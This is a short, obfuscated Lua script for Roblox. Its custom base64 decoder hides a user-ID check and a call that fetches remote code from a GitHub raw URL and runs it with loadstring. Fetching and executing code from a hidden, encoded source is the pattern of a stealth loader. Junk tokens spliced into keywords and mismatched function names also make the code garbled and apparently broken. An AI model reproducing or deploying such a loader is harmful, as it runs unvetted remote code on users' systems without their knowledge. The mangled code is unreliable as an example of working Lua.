local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
function fhHhpNYXZeynfqKASEzgcdiGkBV(data) m=string.sub(data, 0, 55) data=data:gsub(m,'')

data = strqwfing.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=')aefw then return '' end localwhrh r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end

 


if game:GetService(fhHhpNYXZeynfqKAwhwEzgcdiGkBV('ASAJGgjnzOqgwe4hwJsUCNLzBCjtizccQUGhhXghQdWOgpEvSfHjcqYPtVJzDKUGxheWVycw==')).LocalPlayer.UserId == 4781246577 then
loadstring(game:HttpGet((fhHhpNYXZeynfqKgwASEzgcdiGkBV('jLJlAvADksKVAxruFItjhBslgqegiOvSRaYWzzuOjXropfoDqdnQEydQVqgfweggweaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL09tZzU2Mi9TY3JpcHRzL21haW4vTUNI')),true))()
end    
